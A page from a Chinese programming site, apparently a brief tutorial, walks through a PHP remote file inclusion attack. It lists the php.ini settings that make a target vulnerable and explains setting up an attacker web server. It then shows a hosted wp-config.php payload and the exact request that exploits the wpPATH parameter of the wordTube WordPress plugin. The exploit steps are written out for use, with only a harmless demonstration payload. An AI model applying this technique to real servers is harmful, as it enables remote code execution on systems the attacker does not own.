程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> 修改部分php配置實現 遠程包含 攻擊,php配置

修改部分php配置實現 遠程包含 攻擊,php配置

編輯:關於PHP編程

修改部分php配置實現 遠程包含 攻擊,php配置


  1. 調試期間,可以打開display_errors = On 2. 目標機使用了include、require或require_once 3. 目標機配置   a) register_globals = On   b) allow_url_fopen = On   c) allow_url_include = On 這樣的目標就可以進行攻擊了   自己搭建簡易的服務器,apache + php 即可 修改httpd.conf中,將後綴為php的,從而避免代碼在攻擊端就被執行, #AddType application/x-httpd-php .php .html .htm   根據漏洞代碼,生成對應的環境,例如: if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH']; require_once($wppath.'/wp-config.php');   我們就可以建立一個可訪問的文件夾bad_guy, 增加讀權限order allow,deny allow from all , 然後在裡面新建一個wp-config.php
<?php
        mkdir('c:\exploit');
        phpinfo();
        exit;
?>

~然後請求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

來張效果圖:

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved